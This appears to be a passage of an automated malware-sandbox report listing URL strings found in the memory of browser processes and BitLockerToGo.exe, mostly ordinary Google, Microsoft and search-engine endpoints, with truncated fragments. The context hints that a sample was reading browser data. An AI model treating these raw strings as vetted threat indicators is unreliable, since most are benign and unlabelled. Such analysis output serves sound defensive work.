Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656272363.000012B0007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000005.00000002.2654697420.000012B000498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569757464.000012B00037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000005.00000003.2580789480.000012B000294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595839601.000012B00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp, chromecache_450.7.dr, chromecache_451.7.dr	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000005.00000002.2659468525.000012B000EC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes
Source: msedge.exe, 00000009.00000002.2706307468.000001F1C6944000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2701785808.000001F1C6942000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.2885243025.0000020711900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://assets.msn.cn/resolver/
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://assets.msn.com/resolver/
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3094935239.0000000005E7D000.00000004.00000020.00020000.00000000.sdmp, lxlxt0.3.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3094935239.0000000005E7D000.00000004.00000020.00020000.00000000.sdmp, lxlxt0.3.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://browser.events.data.msn.com/
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://c.msn.com/
Source: chrome.exe, 00000005.00000002.2654851711.000012B0004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660153200.000012B001054000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000005.00000003.2576376283.000012B000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596932828.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2568720854.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2631006849.000012B000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657952507.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: BitLockerToGo.exe, 00000003.00000003.2873139264.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874778329.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, oz5fcj.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: offscreendocument_main.js.14.dr, service_worker_bin_prod.js.14.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: chrome.exe, 00000005.00000002.2657994939.000012B000BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000005.00000002.2657994939.000012B000BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: BitLockerToGo.exe, 00000003.00000003.2873139264.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874778329.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3092709929.0000000005BDE000.00000004.00000020.00020000.00000000.sdmp, oz5fcj.3.dr, Web Data.14.dr, knyukx.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000005.00000002.2657021255.000012B000954000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: BitLockerToGo.exe, 00000003.00000003.2873139264.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874778329.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3092709929.0000000005BDE000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2654450308.000012B00040C000.00000004.00000800.00020000.00000000.sdmp, oz5fcj.3.dr, Web Data.14.dr, knyukx.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000005.00000003.2576797867.000012B000DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655292330.000012B000648000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2708742867.000018A00017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.2916119230.00007D880018C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: manifest.json.14.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: chrome.exe, 00000005.00000002.2655292330.000012B000648000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000005.00000002.2657994939.000012B000BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2659957202.000012B000FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660282042.000012B0010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657266018.000012B0009D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658107951.000012B000C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000005.00000003.2569349998.000012B000C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2572184328.000012B000DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2579953695.000012B000C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569383710.000012B000C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2575468628.000012B000C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2576797867.000012B000DA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000005.00000002.2655412620.000012B000684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstorehttps://chrome.google.com/webstore
Source: chrome.exe, 00000005.00000002.2675612452.000063E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000005.00000003.2561091713.000063E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2603547292.000063E000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000005.00000002.2675612452.000063E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000005.00000003.2561091713.000063E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2603547292.000063E000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000005.00000002.2675612452.000063E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000005.00000003.2604683470.000012B00182C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2675612452.000063E000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2602448171.000012B001D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2604750901.000012B001834000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000005.00000003.2561091713.000063E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2603547292.000063E000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000005.00000002.2653544521.000012B00020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000005.00000002.2653544521.000012B00020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: msedge.exe, 0000000D.00000002.2916119230.00007D880018C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.14.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000005.00000002.2659675272.000012B000EF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000005.00000002.2653297340.000012B0001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000005.00000002.2653297340.000012B0001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 00000005.00000003.2557552547.000056FC002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2557526901.000056FC002D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000005.00000002.2653297340.000012B0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2651137635.000012B00001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655440089.000012B000694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657021255.000012B000954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656882184.000012B00091C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2653849494.000012B000290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2564708780.000012B00048C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2707888207.000018A000040000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.2913414716.00007D8800040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.14.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000005.00000002.2657129999.000012B000980000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000005.00000002.2657129999.000012B000980000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000005.00000002.2653297340.000012B0001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000005.00000002.2653297340.000012B0001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chromecache_450.7.dr	String found in binary or memory: https://clients6.google.com
Source: chrome.exe, 00000005.00000002.2655350065.000012B000658000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chromecache_450.7.dr	String found in binary or memory: https://content.googleapis.com
Source: BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3094935239.0000000005E7D000.00000004.00000020.00020000.00000000.sdmp, lxlxt0.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3094935239.0000000005E7D000.00000004.00000020.00020000.00000000.sdmp, lxlxt0.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: chrome.exe, 00000005.00000002.2657561063.000012B000A80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: 2cc80dabc69f58b6_0.14.dr, Reporting and NEL.16.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: chrome.exe, 00000005.00000002.2654148814.000012B0002FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.goog
Source: chrome.exe, 00000005.00000002.2654148814.000012B0002FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.googl0
Source: manifest.json0.14.dr	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000005.00000002.2662219164.000012B001B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2612301914.000012B001B48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000005.00000002.2660841864.000012B00149C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000005.00000002.2660841864.000012B00149C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660340819.000012B00111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656230561.000012B0007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2568464031.000012B000C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658107951.000012B000C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000005.00000002.2660340819.000012B00111C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp&?
Source: chrome.exe, 00000005.00000002.2660841864.000012B00149C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 00000005.00000002.2662219164.000012B001B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2612301914.000012B001B48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/dogl
Source: chrome.exe, 00000005.00000002.2660841864.000012B00149C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658318179.000012B000CB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultP
Source: chrome.exe, 00000005.00000002.2658318179.000012B000CB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
Source: chrome.exe, 00000005.00000002.2662219164.000012B001B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2612301914.000012B001B48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/njb
Source: chrome.exe, 00000005.00000002.2656199136.000012B000798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660125995.000012B001018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2654763220.000012B0004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656230561.000012B0007B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000005.00000002.2656199136.000012B000798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660125995.000012B001018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2654763220.000012B0004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656230561.000012B0007B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000005.00000002.2656199136.000012B000798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660125995.000012B001018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2654763220.000012B0004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656230561.000012B0007B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000005.00000002.2662219164.000012B001B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2612301914.000012B001B48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000005.00000002.2660841864.000012B00149C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000005.00000002.2657680992.000012B000AD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660841864.000012B00149C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2661409753.000012B0019D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2568464031.000012B000C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658107951.000012B000C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000005.00000003.2568464031.000012B000C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapplt
Source: chrome.exe, 00000005.00000002.2660841864.000012B00149C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658318179.000012B000CB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000005.00000002.2658318179.000012B000CB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultB
Source: chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultag
Source: chrome.exe, 00000005.00000002.2662219164.000012B001B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2612301914.000012B001B48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/ogl
Source: chrome.exe, 00000005.00000002.2654851711.000012B0004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660153200.000012B001054000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000005.00000002.2660483630.000012B00129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657021255.000012B000954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2601413703.000012B00129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660125995.000012B001018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2568464031.000012B000C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658107951.000012B000C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultP
Source: chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultjb
Source: chrome.exe, 00000005.00000002.2660483630.000012B00129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2601413703.000012B00129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/ogl
Source: chrome.exe, 00000005.00000002.2654851711.000012B0004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660153200.000012B001054000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chromecache_450.7.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: manifest.json0.14.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.14.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.14.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000005.00000002.2654148814.000012B0002FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp
Source: manifest.json0.14.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000005.00000002.2654148814.000012B0002FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.googl
Source: manifest.json0.14.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000005.00000002.2654148814.000012B0002FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.c
Source: manifest.json0.14.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000005.00000002.2654148814.000012B0002FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.go
Source: manifest.json0.14.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
